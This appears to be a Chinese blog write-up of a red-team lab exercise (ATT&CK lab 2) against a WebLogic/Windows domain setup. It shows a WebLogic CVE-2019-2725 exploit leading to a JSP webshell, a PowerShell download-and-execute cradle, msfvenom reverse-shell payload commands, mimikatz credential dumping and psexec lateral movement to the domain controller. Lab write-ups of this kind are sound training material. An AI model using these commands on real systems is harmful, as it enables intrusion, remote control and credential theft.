ATT&CK红队评估二
ATT&CK红队评估二
1|0靶场搭建
1|1网络拓扑图
1|2环境说明
内网网段:10.10.10.1/24
DMZ网段:192.168.211.1/24
测试机地址:192.168.211.147(Kali Linux)
1|3网络搭建
共有三台虚拟机,DC机,WEB机,PC机。将IP全部设为自动获取,配置信息如下所示:
WEB机:
IP1:192.168.211.150 IP2:10.10.10.129 OS:Windows 2008(64)
应用:Weblogic 10.3.6 MSSQL 2008
PC机:
IP1:192.168.211.151 IP2:10.10.10.128 OS:Windows 7(32)
DC机:
IP:10.10.10.130 OS:Windows 2012(64)
应用:AD域
攻击机:
IP:192.168.211.147 OS:kali linux
三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。
同时需要在web机开启weblogic服务
C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理员身份运行
自此前期工作全部完成
2|0信息收集
2|1nmap扫描
web机ip192.168.211.150
nmap -T4 -A -p 1-65535 192.168.211.150
由nmap扫描结果可知:
端口扫描 | 80,1433,3389,,7001,60966等 |
---|---|
服务版本识别 | IIS httpd 7.5,SQL Server 2008 R2 SP2,远程桌面服务,WebLogic Server |
操作系统信息识别 | Windows Server 2008 R2 - 2012 |
域 | de1ay.com |
访问80端口,无任何内容
发现7001上有weblogic,直接打了
3|0weblogic打点
使用工具weblogicScanner
sudo python3 ws.py -t 192.168.211.150:7001
3|1CVE-2019-2725
访问http://192.168.211.150:7001/_async/AsyncResponseService
网页存在,找POC攻击,dnslog无回显,利用失败
姿势二
存在漏洞
命令执行成功
文件上传
文件路径:C:\\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
shell地址:
http://192.168.211.152:7001/console/framework/skins/wlsconsole/images/shell.jsp
这里一个很奇怪的情况,冰蝎v3.0 Beta9一直连接shell失败
换旧版本连接成功,v3.0 Beta7
4|0渗透工具上线
收集内网信息,内网ip:ipconfig /all
发现存在内网IP段,10.10.10.1/24
4|1免杀
还不会,手动关了360。。。。。
略。。。
4|2cs上线
自动上线
使用冰蝎自带反弹shell至cobalt strike功能,利用失败。。。。无回显,自动不行试手动
手动上线
创建监听器
生成攻击载荷
这里上传成功但是一直拒绝访问,cs上线失败,打开web机发现是被杀了
powershell
cs点击Attack -> Web Drive-by -> Scripted Web Delivery
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.211.147:80/a'))"
一样失败
关闭360,手动上传
4|3提权
这里我傻逼了,嫌冰蝎里执行cs马太慢了,直接在web机执行,但是这里web机的权限并不是最高的,由于weblogic是以administrator用户运行的,所以在冰蝎里执行会是administrator的权限
windows内核提权
将systeminfo写入文件中
systeminfo > 1.txt
使用工具Windows-Exploit-Suggester,查询可用漏洞
生成结果:
加载提权脚本
按理说应该能够提权成功的,但是这里一直失败,找不到原因。这里换思路了
4|4msf上线
但是这里java的反弹shell在后续的提权中存在问题,重新生成一个windows马上传
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.211.147 lport=4444 -f exe -o shell.exe
上传
反弹shell:
解决乱码:
chcp 65001
5|0域渗透
5|1Ladon信息收集
上传ladon
Ladon 10.10.10.1/24 OnlinePC
此时明确内网信息
5|2psexec横向移动
mimikatz抓取密码
通过psexec横向移动
成功拿下域控
6|0域成员渗透
生成木马:
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.211.147 lport=8899 -f exe -o shell3.exe
开启$IPC:
成功获取shell:
成功获取个人PC机的admin权限
至此整个渗透过程完成!
感谢渗透过程中lyc师傅给予的帮助
__EOF__

本文链接:https://www.cnblogs.com/karsa/p/16012987.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· C#/.NET/.NET Core技术前沿周刊 | 第 29 期(2025年3.1-3.9)
· 从HTTP原因短语缺失研究HTTP/2和HTTP/3的设计差异